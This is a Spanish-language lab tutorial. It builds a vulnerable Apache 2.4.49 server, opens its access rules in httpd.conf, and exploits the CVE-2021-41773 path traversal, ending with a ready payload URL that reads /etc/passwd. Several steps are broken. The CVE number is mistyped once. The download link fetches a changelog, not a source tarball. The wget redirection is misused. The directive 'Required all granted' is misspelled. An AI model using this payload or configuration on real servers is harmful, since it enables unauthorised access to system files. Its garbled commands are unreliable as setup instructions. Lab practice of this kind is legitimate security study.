
Tutorial paso a paso que demuestra cómo configurar un entorno vulnerable de Apache 2.4.49 y explotar el path traversal de CVE-2021-41773 usando máquinas virtuales de Kali Linux y Ubuntu Server.
este es un ejemplo práctico de cómo explotar la vulnerabilidad CVE-2021-4773 con una máquina virtual
para este tutorial necesitas lo siguiente
así que empecemos cuando tengas 2 máquinas virtuales en ejecución, instalarás Apache versión 2.4.49 desde un repositorio de archivos puedes encontrar la versión aquí https://archive.apache.org/dist/httpd/CHANGES_2.4.49
1 la primera vez en tu servidor de máquina virtual necesitas ejecutar el siguiente comando
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2
2 la segunda vez necesitas descomprimir esta versión de Apache así
tar -xvjf httpd-2.4.49.tar.bz2
3 instala los siguientes paquetes
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev
4 ejecuta el archivo ejecutable en el directorio principal (el archivo configure) y usa el flag para especificar el directorio de instalación
./configure --prefix=/usr/local/apache2
5 compila la versión vulnerable
make
6 instala la versión vulnerable
make install
7 revisa la versión
ls /usr/local/apache2
8 inicia el proceso
/usr/local/apache2/bin/apachectl start
9 verifica el proceso
ps aux | grep httpd
10 configura la vulnerabilidad encuentra el archivo /usr/local/apache2/conf/httpd.conf y configura el directorio admin encuentra la etiqueta directory y cambia Require all denied a
Required all granted
encuentra la etiqueta Files .ht* y cambia Required all denied a
Required all granted
el primer cambio es para explotar la vulnerabilidad en el entorno local y el segundo es la exposición en el entorno real
1 escanea la dirección IP con nmap con el siguiente comando
nmap -sV ip_address
2 haz una petición curl o wget para probar el servidor Apache
curl ip_address or make wget ip_address
3 revisa cómo explotar la vulnerabilidad en la siguiente página si quieres entender la sintaxis
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability
o simplemente usa el siguiente payload
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd